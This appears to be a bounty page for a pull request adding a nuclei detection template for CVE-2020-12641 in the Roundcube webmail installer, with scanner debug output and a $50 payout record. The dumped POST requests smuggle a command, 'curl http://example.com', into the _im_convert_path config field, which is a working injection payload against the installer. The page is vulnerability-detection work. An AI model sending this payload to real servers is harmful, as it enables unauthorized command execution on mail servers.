PR

Template / PR Information

Added a template for CVE-2020-12641 and will match if the config was successfully updated by the http POST

/claim #12153

Template Validation

I’ve validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

Debug

[INF] [CVE-2020-12641] Dumped HTTP request for http://localhost/installer/index.php



POST /installer/index.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 maglev/24074.2323.2827.4973/49

Connection: close

Content-Length: 983

Accept: */*

Accept-Language: en

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip



_step=2&_product_name=Roundcube+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Froundcube%2Ftemp%2F&_des_key=aaCGmrf1vc2NIJ8whIA3aG9x&_enable_spellcheck=1&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Froundcube%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=localhost&_dbname=roundcube&_dbuser=roundcube&_dbpass=roundcube&_db_prefix=&_default_host%5B%5D=localhost&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=localhost&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_smtp_log=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_prefer_html=1&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_autologon=autologon&_plugins_enigma=enigma&_plugins_zipdownload=zipdownload&submit=UPDATE+CONFIG&G&_im_convert_path=curl+http%3a//example.com

[DBG] [CVE-2020-12641] Dumped HTTP response http://localhost/installer/index.php



HTTP/1.1 404 Not Found

Connection: close

Content-Length: 271

Content-Type: text/html; charset=iso-8859-1

Date: Sun, 01 Jun 2025 15:25:07 GMT

Server: Apache/2.4.52 (Debian)



<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>404 Not Found</title>

</head><body>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

<hr>

<address>Apache/2.4.52 (Debian) Server at localhost Port 80</address>

</body></html>

[INF] [CVE-2020-12641] Dumped HTTP request for http://localhost/roundcube/installer/index.php



POST /roundcube/installer/index.php HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70

Connection: close

Content-Length: 983

Accept: */*

Accept-Language: en

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip



_step=2&_product_name=Roundcube+Webmail&_support_url=&_skin_logo=&_temp_dir=%2Fvar%2Fwww%2Fhtml%2Froundcube%2Ftemp%2F&_des_key=aaCGmrf1vc2NIJ8whIA3aG9x&_enable_spellcheck=1&_spellcheck_engine=googie&_identities_level=0&_log_driver=file&_log_dir=%2Fvar%2Fwww%2Fhtml%2Froundcube%2Flogs%2F&_syslog_id=roundcube&_syslog_facility=8&_dbtype=mysql&_dbhost=localhost&_dbname=roundcube&_dbuser=roundcube&_dbpass=roundcube&_db_prefix=&_default_host%5B%5D=localhost&_default_port=143&_username_domain=&_auto_create_user=1&_sent_mbox=Sent&_trash_mbox=Trash&_drafts_mbox=Drafts&_junk_mbox=Junk&_smtp_server=localhost&_smtp_port=587&_smtp_user=%25u&_smtp_pass=%25p&_smtp_user_u=1&_smtp_log=1&_language=&_skin=elastic&_mail_pagesize=50&_addressbook_pagesize=50&_prefer_html=1&_htmleditor=0&_draft_autosave=300&_mdn_requests=0&_mime_param_folding=1&_plugins_autologon=autologon&_plugins_enigma=enigma&_plugins_zipdownload=zipdownload&submit=UPDATE+CONFIG&G&_im_convert_path=curl+http%3a//example.com

[DBG] [CVE-2020-12641] Dumped HTTP response http://localhost/roundcube/installer/index.php



HTTP/1.1 200 OK

Connection: close

Cache-Control: no-store, no-cache, must-revalidate

Content-Type: text/html; charset=UTF-8

Date: Sun, 01 Jun 2025 15:25:07 GMT

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Pragma: no-cache

Server: Apache/2.4.52 (Debian)

Set-Cookie: PHPSESSID=65edfd177450d17bdacfeac4a688f9e2; path=/

Vary: Accept-Encoding

X-Powered-By: PHP/7.3.33



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

<title>Roundcube Webmail Installer</title>

<meta name="Robots" content="noindex,nofollow" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" href="styles.css" />

<script type="text/javascript" src="client.js"></script>

</head>



<body>



<div id="banner">

  <div class="banner-bg"></div>

  <div class="banner-logo"><a href="http://roundcube.net"><img src="images/roundcube_logo.png" width="210" height="55" border="0" alt="Roundcube - open source webmail software" /></a></div>

</div>



<div id="topnav">

  <a href="https://github.com/roundcube/roundcubemail/wiki/Installation">How-to Wiki</a>

</div>



<div id="content">





<h1>Roundcube Webmail Installer</h1>



<ol id="progress">

<li class="step2 passed"><a href="./index.php?_step=1">Check environment</a></li><li class="step3 current"><a href="./index.php?_step=2">Create config</a></li><li class="step4"><a href="./index.php?_step=3">Test config</a></li></ol>



<p class="notice">The config file was saved successfully into <tt>/var/www/html/roundcube/config</tt> directory of your Roundcube installation.</p><p class="hint">Of course there are more options to configure.

    Have a look at the defaults.inc.php file or visit <a href="https://github.com/roundcube/roundcubemail/wiki/Configuration" target="_blank">Howto_Config</a> to find out.</p><p><input type="button" onclick="location.href='./index.php?_step=3'" value="CONTINUE" /></p>

<hr style='margin-bottom:1.6em' />

<form action="index.php" method="post">

<input type="hidden" name="_step" value="2" />



<fieldset>

<legend>General configuration</legend>

<dl class="configblock">



<dt class="propname">product_name</dt>

<dd>

<input name="_product_name" size="30" id="cfgprodname" value="Roundcube Webmail" type="text"><div>The name of your service (used to compose page titles)</div>

</dd>



<dt class="propname">support_url</dt>

<dd>

<input name="_support_url" size="50" id="cfgsupporturl" value="" type="text"><div>Provide an URL where a user can get support for this Roundcube installation.<br/>PLEASE DO NOT LINK TO THE ROUNDCUBE.NET WEBSITE HERE!</div>

<p class="hint">Enter an absolute URL (including http://) to a support page/form or a mailto: link.</p>

</dd>



<dt class="propname">skin_logo</dt>

<dd>

<input name="_skin_logo" size="50" id="cfgskinlogo" value="" type="text"><div>Custom image to display instead of the Roundcube logo.</div>

<p class="hint">Enter a URL relative to the document root of this Roundcube installation.</p>

</dd>



<dt class="propname">temp_dir</dt>

<dd>

<input name="_temp_dir" size="30" id="cfgtempdir" value="/var/www/html/roundcube/temp/" type="text"><div>Use this folder to store temp files (must be writeable for webserver)</div>

</dd>



<dt class="propname">des_key</dt>

<dd>

<input name="_des_key" size="30" id="cfgdeskey" value="aaCGmrf1vc2NIJ8whIA3aG9x" type="text"><div>This key is used to encrypt the users imap password before storing in the session record</div>

<p class="hint">It's a random generated string to ensure that every installation has its own key.</p>

</dd>



<dt class="propname">ip_check</dt>

<dd>

<input name="_ip_check" id="cfgipcheck" value="1" type="checkbox"><label for="cfgipcheck">Check client IP in session authorization</label><br />



<p class="hint">This increases security but can cause sudden logouts when someone uses a proxy with changing IPs.</p>

</dd>





<dt class="propname">enable_spellcheck</dt>

<dd>

<input name="_enable_spellcheck" id="cfgspellcheck" value="1" checked="checked" type="checkbox"><label for="cfgspellcheck">Make use of the spell checker</label><br />

</dd>



<dt class="propname">spellcheck_engine</dt>

<dd>

<select name="_spellcheck_engine" id="cfgspellcheckengine">

<option value="googie" selected="selected">Googie</option>

<option value="atd">ATD</option>

</select>

<label for="cfgspellcheckengine">Which spell checker to use</label><br />



<p class="hint">Googie implies that the message content will be sent to external server to check the spelling.</p>

</dd>



<dt class="propname">identities_level</dt>

<dd>

<select name="_identities_level" id="cfgidentitieslevel">

<option value="0" selected="selected">many identities with possibility to edit all params</option>

<option value="1">many identities with possibility to edit all params but not email address</option>

<option value="2">one identity with possibility to edit all params</option>

<option value="3">one identity with possibility to edit all params but not email address</option>

<option value="4">one identity with possibility to edit only signature</option>

</select>

<div>Level of identities access</div>

<p class="hint">Defines what users can do with their identities.</p>

</dd>



</dl>

</fieldset>



<fieldset>

<legend>Logging & Debugging</legend>

<dl class="loggingblock">



<dt class="propname">log_driver</dt>

<dd>

<select name="_log_driver" id="cfglogdriver">

<option value="file" selected="selected">file</option>

<option value="syslog">syslog</option>

<option value="stdout">stdout</option>

</select>

<div>How to do logging? 'file' - write to files in the log directory, 'syslog' - use the syslog facility, 'stdout' writes to the process' STDOUT file descriptor.</div>

</dd>



<dt class="propname">log_dir</dt>

<dd>

<input name="_log_dir" size="30" id="cfglogdir" value="/var/www/html/roundcube/logs/" type="text"><div>Use this folder to store log files (must be writeable for webserver). Note that this only applies if you are using the 'file' log_driver.</div>

</dd>



<dt class="propname">syslog_id</dt>

<dd>

<input name="_syslog_id" size="30" id="cfgsyslogid" value="roundcube" type="text"><div>What ID to use when logging with syslog. Note that this only applies if you are using the 'syslog' log_driver.</div>

</dd>



<dt class="propname">syslog_facility</dt>

<dd>

<select name="_syslog_facility" id="cfgsyslogfacility">

<option value="8" selected="selected">user-level messages</option>

<option value="16">mail subsystem</option>

<option value="128">local level 0</option>

<option value="136">local level 1</option>

<option value="144">local level 2</option>

<option value="152">local level 3</option>

<option value="160">local level 4</option>

<option value="168">local level 5</option>

<option value="176">local level 6</option>

<option value="184">local level 7</option>

</select>

<div>What ID to use when logging with syslog.  Note that this only applies if you are using the 'syslog' log_driver.</div>

</dd>









</dl>

</fieldset>





<fieldset>

<legend>Database setup</legend>

<dl class="configblock" id="cgfblockdb">

<dt class="propname">db_dsnw</dt>

<dd>

<p>Database settings for read/write operations:</p>

<select name="_dbtype" id="cfgdbtype">

<option value="sqlite">SQLite</option>

</select>

<label for="cfgdbtype">Database type</label><br /><input name="_dbhost" size="20" id="cfgdbhost" value="localhost" type="text"><label for="cfgdbhost">Database server (omit for sqlite)</label><br /><input name="_dbname" size="20" id="cfgdbname" value="roundcube" type="text"><label for="cfgdbname">Database name (use absolute path and filename for sqlite)</label><br /><input name="_dbuser" size="20" id="cfgdbuser" value="roundcube" type="text"><label for="cfgdbuser">Database user name (needs write permissions)(omit for sqlite)</label><br /><input name="_dbpass" size="20" id="cfgdbpass" value="roundcube" type="text"><label for="cfgdbpass">Database password (omit for sqlite)</label><br /></dd>



<dt class="propname">db_prefix</dt>

<dd>

<input name="_db_prefix" size="20" id="cfgdbprefix" value="" type="text"><div>Optional prefix that will be added to database object names (tables and sequences).</div>

</dd>



</dl>

</fieldset>





<fieldset>

<legend>IMAP Settings</legend>

<dl class="configblock" id="cgfblockimap">

<dt class="propname">default_host</dt>

<dd>

<div>The IMAP host(s) chosen to perform the log-in</div>

<div id="defaulthostlist">

<div id="defaulthostentry0"><input name="_default_host[]" size="30" value="localhost" type="text"></div></div>

<div><a href="javascript:addhostfield()" class="addlink" title="Add another field">add</a></div>



<p class="hint">Leave blank to show a textbox at login. To use SSL/IMAPS connection, type ssl://hostname</p>

</dd>



<dt class="propname">default_port</dt>

<dd>

<input name="_default_port" size="6" id="cfgimapport" value="143" type="text"><div>TCP port used for IMAP connections</div>

</dd>



<dt class="propname">username_domain</dt>

<dd>

<input name="_username_domain" size="30" id="cfguserdomain" value="" type="text"><div>Automatically add this domain to user names for login</div>



<p class="hint">Only for IMAP servers that require full e-mail addresses for login</p>

</dd>



<dt class="propname">auto_create_user</dt>

<dd>

<input name="_auto_create_user" id="cfgautocreate" value="1" checked="checked" type="checkbox"><label for="cfgautocreate">Automatically create a new Roundcube user when log-in the first time</label><br />



<p class="hint">A user is authenticated by the IMAP server but it requires a local record to store settings

and contacts. With this option enabled a new user record will automatically be created once the IMAP login succeeds.</p>



<p class="hint">If this option is disabled, the login only succeeds if there's a matching user-record in the local Roundcube database

what means that you have to create those records manually or disable this option after the first login.</p>

</dd>



<dt class="propname">sent_mbox</dt>

<dd>

<input name="_sent_mbox" size="20" id="cfgsentmbox" value="Sent" type="text"><div>Store sent messages in this folder</div>



<p class="hint">Leave blank if sent messages should not be stored. Note: folder must include namespace prefix if any.</p>

</dd>



<dt class="propname">trash_mbox</dt>

<dd>

<input name="_trash_mbox" size="20" id="cfgtrashmbox" value="Trash" type="text"><div>Move messages to this folder when deleting them</div>



<p class="hint">Leave blank if they should be deleted directly. Note: folder must include namespace prefix if any.</p>

</dd>



<dt class="propname">drafts_mbox</dt>

<dd>

<input name="_drafts_mbox" size="20" id="cfgdraftsmbox" value="Drafts" type="text"><div>Store draft messages in this folder</div>



<p class="hint">Leave blank if they should not be stored. Note: folder must include namespace prefix if any.</p>

</dd>



<dt class="propname">junk_mbox</dt>

<dd>

<input name="_junk_mbox" size="20" id="cfgjunkmbox" value="Junk" type="text"><div>Store spam messages in this folder</div>



<p class="hint">Note: folder must include namespace prefix if any.</p>

</dd>



</dd>

</dl>

</fieldset>





<fieldset>

<legend>SMTP Settings</legend>

<dl class="configblock" id="cgfblocksmtp">

<dt class="propname">smtp_server</dt>

<dd>

<input name="_smtp_server" size="30" id="cfgsmtphost" value="localhost" type="text"><div>Use this host for sending mails</div>



<p class="hint">To use SSL connection, set ssl://smtp.host.com.</p>

</dd>



<dt class="propname">smtp_port</dt>

<dd>

<input name="_smtp_port" size="6" id="cfgsmtpport" value="25" type="text"><div>SMTP port (default is 587)</div>

</dd>



<dt class="propname">smtp_user/smtp_pass</dt>

<dd>

<input name="_smtp_user" size="20" id="cfgsmtpuser" value="" type="text"><input name="_smtp_pass" size="20" id="cfgsmtppass" value="" type="text"><div>SMTP username and password (if required)</div>

<p>

<input name="_smtp_user_u" id="cfgsmtpuseru" value="1" checked="checked" type="checkbox"><label for="cfgsmtpuseru">Use the current IMAP username and password for SMTP authentication</label>

</p>

</dd>

<!--

<dt class="propname">smtp_auth_type</dt>

<dd>

<div>Method to authenticate at the SMTP server. Choose (auto) if you don't know what this is</div>

</dd>

-->

<dt class="propname">smtp_log</dt>

<dd>

<input name="_smtp_log" id="cfgsmtplog" value="1" checked="checked" type="checkbox"><label for="cfgsmtplog">Log sent messages in <tt>{log_dir}/sendmail</tt> or to syslog.</label><br />

</dd>



</dl>

</fieldset>





<fieldset>

<legend>Display settings &amp; user prefs</legend>

<dl class="configblock" id="cgfblockdisplay">



<dt class="propname">language <span class="userconf">*</span></dt>

<dd>

<input name="_language" size="6" id="cfglocale" value="" type="text"><div>The default locale setting. This also defines the language of the login screen.<br/>Leave it empty to auto-detect the user agent language.</div>

<p class="hint">Enter a <a href="http://www.faqs.org/rfcs/rfc1766">RFC1766</a> formatted language name. Examples: en_US, de_DE, de_CH, fr_FR, pt_BR</p>

</dd>



<dt class="propname">skin <span class="userconf">*</span></dt>

<dd>

<select name="_skin" id="cfgskin">

<option>classic</option>

<option>elastic</option>

<option selected="selected">larry</option>

</select>

<div>Name of interface skin (folder in /skins)</div>

</dd>



<dt class="propname">mail_pagesize <span class="userconf">*</span></dt>

<dd>

<input name="_mail_pagesize" size="6" id="cfgmailpagesize" value="50" type="text"><div>Show up to X items in the mail messages list view.</div>

</dd>



<dt class="propname">addressbook_pagesize <span class="userconf">*</span></dt>

<dd>

<input name="_addressbook_pagesize" size="6" id="cfgabookpagesize" value="50" type="text"><div>Show up to X items in the contacts list view.</div>

</dd>



<dt class="propname">prefer_html <span class="userconf">*</span></dt>

<dd>

<input name="_prefer_html" id="cfghtmlview" value="1" checked="checked" type="checkbox"><label for="cfghtmlview">Prefer displaying HTML messages</label><br />

</dd>



<dt class="propname">htmleditor <span class="userconf">*</span></dt>

<dd>

<label for="cfghtmlcompose">Compose HTML formatted messages</label>

<select name="_htmleditor" id="cfghtmlcompose">

<option value="0" selected="selected">never</option>

<option value="1">always</option>

<option value="2">on reply to HTML message only</option>

</select>

</dd>



<dt class="propname">draft_autosave <span class="userconf">*</span></dt>

<dd>

<label for="cfgautosave">Save compose message every</label>

<select name="_draft_autosave" id="cfgautosave">

<option value="0">never</option>

<option value="60">1 min</option>

<option value="180">3 min</option>

<option value="300" selected="selected">5 min</option>

<option value="600">10 min</option>

</select>

</dd>



<dt class="propname">mdn_requests <span class="userconf">*</span></dt>

<dd>

<select name="_mdn_requests" id="cfgmdnreq">

<option value="0" selected="selected">ask the user</option>

<option value="1">send automatically</option>

<option value="3">send receipt to user contacts, otherwise ask the user</option>

<option value="4">send receipt to user contacts, otherwise ignore</option>

<option value="2">ignore</option>

</select>

<div>Behavior if a received message requests a message delivery notification (read receipt)</div>

</dd>



<dt class="propname">mime_param_folding <span class="userconf">*</span></dt>

<dd>

<select name="_mime_param_folding" id="cfgmimeparamfolding">

<option value="0">Full RFC 2231 (Roundcube, Thunderbird)</option>

<option value="1" selected="selected">RFC 2047/2231 (MS Outlook, OE)</option>

<option value="2">Full RFC 2047 (deprecated)</option>

</select>

<div>How to encode attachment long/non-ascii names</div>

</dd>



</dl>



<p class="hint"><span class="userconf">*</span>&nbsp; These settings are defaults for the user preferences</p>

</fieldset>





<fieldset>

<legend>Plugins</legend>

<dl class="configblock" id="cgfblockdisplay">



<dt class="propname"><label><input name="_plugins_acl" id="cfgplugin_acl" value="acl" type="checkbox">&nbsp;acl</label></dt><dd><label for="cfgplugin_acl" class="hint">IMAP Folders Access Control Lists Management (RFC4314, RFC2086).</label><br/></dd><dt class="propname"><label><input name="_plugins_additional_message_headers" id="cfgplugin_additional_message_headers" value="additional_message_headers" type="checkbox">&nbsp;additional_message_headers</label></dt><dd><label for="cfgplugin_additional_message_headers" class="hint">Very simple plugin which will add additional headers to or remove them from outgoing messages.</label><br/></dd><dt class="propname"><label><input name="_plugins_archive" id="cfgplugin_archive" value="archive" type="checkbox">&nbsp;archive</label></dt><dd><label for="cfgplugin_archive" class="hint">This adds a button to move the selected messages to an archive folder. The folder (and the optional structure of subfolders) can be selected in the settings panel.</label><br/></dd><dt class="propname"><label><input name="_plugins_attachment_reminder" id="cfgplugin_attachment_reminder" value="attachment_reminder" type="checkbox">&nbsp;attachment_reminder</label></dt><dd><label for="cfgplugin_attachment_reminder" class="hint">This Roundcube plugin reminds the user to attach a file if the composed message text indicates that there should be any.</label><br/></dd><dt class="propname"><label><input name="_plugins_autologon" id="cfgplugin_autologon" value="autologon" checked="checked" type="checkbox">&nbsp;autologon</label></dt><dd><label for="cfgplugin_autologon" class="hint">Sample plugin to try out some hooks</label><br/></dd><dt class="propname"><label><input name="_plugins_database_attachments" id="cfgplugin_database_attachments" value="database_attachments" type="checkbox">&nbsp;database_attachments</label></dt><dd><label for="cfgplugin_database_attachments" class="hint">This plugin which provides database backed storage for temporary attachment file handling. The primary advantage of this plugin is its compatibility with round-robin dns multi-server Roundcube installations.</label><br/></dd><dt class="propname"><label><input name="_plugins_debug_logger" id="cfgplugin_debug_logger" value="debug_logger" type="checkbox">&nbsp;debug_logger</label></dt><dd><label for="cfgplugin_debug_logger" class="hint">Enhanced logging for debugging purposes. It is not recommened to be enabled on production systems without testing because of the somewhat increased memory, cpu and disk i/o overhead.</label><br/></dd><dt class="propname"><label><input name="_plugins_emoticons" id="cfgplugin_emoticons" value="emoticons" type="checkbox">&nbsp;emoticons</label></dt><dd><label for="cfgplugin_emoticons" class="hint">Plugin that adds emoticons support.</label><br/></dd><dt class="propname"><label><input name="_plugins_enigma" id="cfgplugin_enigma" value="enigma" checked="checked" type="checkbox">&nbsp;enigma</label></dt><dd><label for="cfgplugin_enigma" class="hint">Server-side PGP Encryption for Roundcube</label><br/></dd><dt class="propname"><label><input name="_plugins_example_addressbook" id="cfgplugin_example_addressbook" value="example_addressbook" type="checkbox">&nbsp;example_addressbook</label></dt><dd><label for="cfgplugin_example_addressbook" class="hint">Sample plugin to add a new address book with just a static list of contacts</label><br/></dd><dt class="propname"><label><input name="_plugins_filesystem_attachments" id="cfgplugin_filesystem_attachments" value="filesystem_attachments" type="checkbox">&nbsp;filesystem_attachments</label></dt><dd><label for="cfgplugin_filesystem_attachments" class="hint">This is a core plugin which provides basic, filesystem based attachment temporary file handling. This includes storing attachments of messages currently being composed, writing attachments to disk when drafts with attachments are re-opened and writing attachments to disk for inline display in current html compositions.</label><br/></dd><dt class="propname"><label><input name="_plugins_help" id="cfgplugin_help" value="help" type="checkbox">&nbsp;help</label></dt><dd><label for="cfgplugin_help" class="hint">Plugin adds a new item (Help) in taskbar.</label><br/></dd><dt class="propname"><label><input name="_plugins_hide_blockquote" id="cfgplugin_hide_blockquote" value="hide_blockquote" type="checkbox">&nbsp;hide_blockquote</label></dt><dd><label for="cfgplugin_hide_blockquote" class="hint">This allows to hide long blocks of cited text in messages.</label><br/></dd><dt class="propname"><label><input name="_plugins_http_authentication" id="cfgplugin_http_authentication" value="http_authentication" type="checkbox">&nbsp;http_authentication</label></dt><dd><label for="cfgplugin_http_authentication" class="hint">HTTP Basic Authentication</label><br/></dd><dt class="propname"><label><input name="_plugins_identicon" id="cfgplugin_identicon" value="identicon" type="checkbox">&nbsp;identicon</label></dt><dd><label for="cfgplugin_identicon" class="hint">Displays Github-like identicons for contacts/addresses without photo specified.</label><br/></dd><dt class="propname"><label><input name="_plugins_identity_select" id="cfgplugin_identity_select" value="identity_select" type="checkbox">&nbsp;identity_select</label></dt><dd><label for="cfgplugin_identity_select" class="hint">On reply to a message user identity selection is based on

                content of standard headers like From, To, Cc and Return-Path.

                Here you can add header(s) set by your SMTP server (e.g.

                Delivered-To, Envelope-To, X-Envelope-To, X-RCPT-TO) to make

                identity selection more accurate.</label><br/></dd><dt class="propname"><label><input name="_plugins_jqueryui" id="cfgplugin_jqueryui" value="jqueryui" type="checkbox">&nbsp;jqueryui</label></dt><dd><label for="cfgplugin_jqueryui" class="hint">Plugin adds the complete jQuery-UI library including the smoothness theme to Roundcube. This allows other plugins to use jQuery-UI without having to load their own version. The benefit of using one central jQuery-UI is that we wont run into problems of conflicting jQuery libraries being loaded. All plugins that want to use jQuery-UI should use this plugin as a requirement.</label><br/></dd><dt class="propname"><label><input name="_plugins_krb_authentication" id="cfgplugin_krb_authentication" value="krb_authentication" type="checkbox">&nbsp;krb_authentication</label></dt><dd><label for="cfgplugin_krb_authentication" class="hint">Kerberos Authentication</label><br/></dd><dt class="propname"><label><input name="_plugins_managesieve" id="cfgplugin_managesieve" value="managesieve" type="checkbox">&nbsp;managesieve</label></dt><dd><label for="cfgplugin_managesieve" class="hint">Adds a possibility to manage Sieve scripts (incoming mail filters). It's clickable interface which operates on text scripts and communicates with server using managesieve protocol. Adds Filters tab in Settings.</label><br/></dd><dt class="propname"><label><input name="_plugins_markasjunk" id="cfgplugin_markasjunk" value="markasjunk" type="checkbox">&nbsp;markasjunk</label></dt><dd><label for="cfgplugin_markasjunk" class="hint">Adds buttons to mark messages as Junk/Non-Junk with moving to the Junk folder and Spam/Ham learning.</label><br/></dd><dt class="propname"><label><input name="_plugins_new_user_dialog" id="cfgplugin_new_user_dialog" value="new_user_dialog" type="checkbox">&nbsp;new_user_dialog</label></dt><dd><label for="cfgplugin_new_user_dialog" class="hint">When a new user is created, this plugin checks the default identity and sets a session flag in case it is incomplete. An overlay box will appear on the screen until the user has reviewed/completed his identity.</label><br/></dd><dt class="propname"><label><input name="_plugins_new_user_identity" id="cfgplugin_new_user_identity" value="new_user_identity" type="checkbox">&nbsp;new_user_identity</label></dt><dd><label for="cfgplugin_new_user_identity" class="hint">Populates a new user's default identity from LDAP on their first visit.</label><br/></dd><dt class="propname"><label><input name="_plugins_newmail_notifier" id="cfgplugin_newmail_notifier" value="newmail_notifier" type="checkbox">&nbsp;newmail_notifier</label></dt><dd><label for="cfgplugin_newmail_notifier" class="hint">Supports three methods of notification: 1. Basic - focus browser window and change favicon 2. Sound - play wav file 3. Desktop - display desktop notification (using HTML5 Notification API feature).</label><br/></dd><dt class="propname"><label><input name="_plugins_password" id="cfgplugin_password" value="password" type="checkbox">&nbsp;password</label></dt><dd><label for="cfgplugin_password" class="hint">Password Change for Roundcube. Plugin adds a possibility to change user password using many methods (drivers) via Settings/Password tab.</label><br/></dd><dt class="propname"><label><input name="_plugins_redundant_attachments" id="cfgplugin_redundant_attachments" value="redundant_attachments" type="checkbox">&nbsp;redundant_attachments</label></dt><dd><label for="cfgplugin_redundant_attachments" class="hint">This plugin provides a redundant storage for temporary uploaded attachment files. They are stored in both the database backend as well as on the local file system. It provides also memcache store as a fallback.</label><br/></dd><dt class="propname"><label><input name="_plugins_show_additional_headers" id="cfgplugin_show_additional_headers" value="show_additional_headers" type="checkbox">&nbsp;show_additional_headers</label></dt><dd><label for="cfgplugin_show_additional_headers" class="hint">Proof-of-concept plugin which will fetch additional headers and display them in the message view.</label><br/></dd><dt class="propname"><label><input name="_plugins_squirrelmail_usercopy" id="cfgplugin_squirrelmail_usercopy" value="squirrelmail_usercopy" type="checkbox">&nbsp;squirrelmail_usercopy</label></dt><dd><label for="cfgplugin_squirrelmail_usercopy" class="hint">Copy a new users identity and settings from a nearby Squirrelmail installation</label><br/></dd><dt class="propname"><label><input name="_plugins_subscriptions_option" id="cfgplugin_subscriptions_option" value="subscriptions_option" type="checkbox">&nbsp;subscriptions_option</label></dt><dd><label for="cfgplugin_subscriptions_option" class="hint">A plugin which can enable or disable the use of imap subscriptions. It includes a toggle on the settings page under "Server Settings". The preference can also be locked.</label><br/></dd><dt class="propname"><label><input name="_plugins_userinfo" id="cfgplugin_userinfo" value="userinfo" type="checkbox">&nbsp;userinfo</label></dt><dd><label for="cfgplugin_userinfo" class="hint">Sample plugin that adds a new tab to the settings section to display some information about the current user.</label><br/></dd><dt class="propname"><label><input name="_plugins_vcard_attachments" id="cfgplugin_vcard_attachments" value="vcard_attachments" type="checkbox">&nbsp;vcard_attachments</label></dt><dd><label for="cfgplugin_vcard_attachments" class="hint">Detects vCard attachments and allows to add them to address book. Also allows to attach vCards of your contacts to composed messages</label><br/></dd><dt class="propname"><label><input name="_plugins_virtuser_file" id="cfgplugin_virtuser_file" value="virtuser_file" type="checkbox">&nbsp;virtuser_file</label></dt><dd><label for="cfgplugin_virtuser_file" class="hint">Plugin adds possibility to resolve user email/login according to lookup tables in files.</label><br/></dd><dt class="propname"><label><input name="_plugins_virtuser_query" id="cfgplugin_virtuser_query" value="virtuser_query" type="checkbox">&nbsp;virtuser_query</label></dt><dd><label for="cfgplugin_virtuser_query" class="hint">Plugin adds possibility to resolve user email/login according to lookup tables in SQL database.</label><br/></dd><dt class="propname"><label><input name="_plugins_zipdownload" id="cfgplugin_zipdownload" value="zipdownload" checked="checked" type="checkbox">&nbsp;zipdownload</label></dt><dd><label for="cfgplugin_zipdownload" class="hint">Adds an option to download all attachments to a message in one zip file, when a message has multiple attachments. Also allows the download of a selection of messages in one zip file. Supports mbox and maildir format.</label><br/></dd></dl>



<p class="hint">Please consider checking dependencies of enabled plugins</p>

</fieldset>



<p><input type="submit" name="submit" value="UPDATE CONFIG"  /></p></form>

</div>



<div id="footer">

  Installer by the Roundcube Dev Team. Copyright &copy; 2008-2012  Published under the GNU Public License;&nbsp;

  Icons by <a href="http://famfamfam.com">famfamfam</a>

</div>

</body>

</html>

[CVE-2020-12641:status-1] [http] [critical] http://localhost/roundcube/installer/index.php

[CVE-2020-12641:word-2] [http] [critical] http://localhost/roundcube/installer/index.php

Claim

Total prize pool $50
Total paid $50
Status Approved
Submitted June 01, 2025
Last updated June 01, 2025

Contributors

DO

Dominic Whewell

@domwhewell-sage

 100%

Sponsors

PR

ProjectDiscovery

@projectdiscovery

$50 paid